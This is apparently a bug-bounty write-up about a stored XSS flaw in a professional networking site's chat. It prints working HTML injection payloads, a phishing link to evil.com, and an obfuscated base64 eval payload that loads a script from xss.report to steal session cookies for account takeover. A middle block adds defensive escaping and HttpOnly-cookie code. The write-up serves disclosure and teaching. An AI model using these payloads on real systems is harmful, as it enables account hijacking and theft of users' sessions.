From Innocent Messages to Total Takeover: How I Hacked a Professional Network!


Lord Heaven

Let me take you on an exciting journey of how I uncovered a massive security flaw in a professional networking platform, similar to LinkedIn, and turned harmless chat messages into a devastating account takeover exploit! 😱

I stumbled upon redacted.com, a big-name and famous company in the networking space. It offered features like:

- Professional profile creation
- Posting updates
- Connecting with others
- And surprisingly, messaging anyone, even if you weren’t connected!

This was unlike LinkedIn, where messaging is restricted unless you’re connected or a premium member. My hacker instincts tingled! Was there a flaw in this “open” messaging system? Time to find out! 😏

To test the waters, I created two accounts:

- Account 1 (Attacker): My hacker persona.
- Account 2 (Victim): The target for my experiments.

I began testing the platform’s chat system by sending basic HTML payloads from Account 1 to Account 2. Here are a few examples:

1. Image injection

<img src="https://example.com/hacker.jpg">

2. Phishing link

<a href="https://evil.com" style="color: red; font-size: 20px;">Click here to win $25!</a>

3. Iframe injection

"><iframe src="https://www.cia.gov" style="border:0; width:100%; height:100%;"></iframe>

Result? 🎉 Everything worked! The platform rendered my raw HTML payloads without sanitizing them. This was critical because it meant the system wasn’t protecting against malicious inputs.

Next, I decided to test for stored XSS. Stored XSS occurs when malicious scripts are saved on the server and executed whenever a user interacts with the vulnerable page.

Here’s the payload I tried:

<img src/onerror=prompt(document.cookie)>

Here’s what happened:

- When Account 2 opened the chat, the payload executed, triggering a pop-up showing the victim’s cookies. 🍪
- Even Account 1 (the sender) would see the XSS pop-up upon revisiting the chat.

This confirmed the presence of a stored XSS vulnerability in the chat system. But I wasn’t going to stop here. The real goal? Full account takeover.

I crafted a blind XSS payload to escalate the attack. This payload would steal the victim’s session cookies and send them to my server for exploitation. Here’s what I used:

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2xvcmRvZmhlYXZlbjEyMzQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

How It Played Out:

1. I sent the payload from Account 1 to Account 2 via chat.
2. When Account 2 opened the chat, the payload executed in their browser.
3. The payload sent Account 2’s session cookies to my endpoint on xss.report.
4. Using those cookies, I logged into Account 2 without needing their credentials.

BOOM! 💥 Account takeover achieved.

This vulnerability was catastrophic. An attacker could:

- Hijack any user’s account by simply sending them a malicious chat message.
- Automate the attack to compromise thousands of accounts in minutes.

Platforms like redacted.com are trusted by professionals, and such a flaw could seriously harm their reputation.
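The rendering flaw described above and the fixes that would have blunted it, as an added example that is not the post’s own code or the platform’s: a concatenation pattern that reproduces the behaviour observed in the chat, an escaping renderer beside it, and a session cookie issued with HttpOnly so document.cookie no longer exposes it. The sample messages are the article’s own payloads, embedded as constructed input; the function names are mine.

```javascript
// Added example, not the post's or the platform's code: the unsafe rendering
// pattern the article describes, an escaping renderer beside it, and the
// cookie flag that would have blunted the cookie-theft step. Node.js, no deps.

// The chat messages the article reports sending (constructed sample input).
const SAMPLE_MESSAGES = [
  '<img src="https://example.com/hacker.jpg">',
  '<img src/onerror=prompt(document.cookie)>',
  '"><iframe src="https://www.cia.gov"></iframe>',
];

// Vulnerable pattern: the message body is concatenated straight into markup,
// so any tag or on* handler the sender wrote is parsed by the recipient's browser.
function renderMessageUnsafe(sender, body) {
  return `<div class="msg"><b>${sender}</b>: ${body}</div>`;
}

// Escape the five characters that can change HTML context, for text placed
// between tags or inside a double/single-quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: sender name and body are both escaped before concatenation.
function renderMessageSafe(sender, body) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(body)}</div>`;
}

// An escaped fragment contains no raw '<' or '>' and therefore can never open a
// tag, which is what neutralises both the <img onerror> and the "><iframe> vectors.
function isInertFragment(fragment) {
  return !/[<>]/.test(fragment);
}

// Defence in depth: HttpOnly keeps the session cookie out of document.cookie, so a
// payload that exfiltrates document.cookie gets nothing; Secure and SameSite limit
// where the cookie travels. (Stored XSS must still be fixed at the rendering layer.)
function buildSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

for (const body of SAMPLE_MESSAGES) {
  console.log('unsafe:', renderMessageUnsafe('attacker', body));
  console.log('safe:  ', renderMessageSafe('attacker', body));
}
console.log(buildSessionCookie('session', 'example-session-id'));
```

Escaping at output time is the fix for the bug itself; the cookie flags only limit what a remaining XSS can reach.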

I discovered and reported this vulnerability over six months ago to redacted.com. I even followed up via email. Unfortunately, I never received any response.

As a bug bounty hunter, I value platforms that take security seriously. However, the lack of action here left me disappointed. I decided to share my findings through this article to help the community learn and to emphasize the importance of addressing security issues promptly.

This was my first Medium article, and I hope you found it insightful! 🙌

Discovering and exploiting vulnerabilities like these reminds us how small oversights can lead to significant security risks. Let me know your thoughts in the comments, and feel free to share any similar experiences you’ve had!

Would love your feedback, especially since this is my first-ever article! 😊
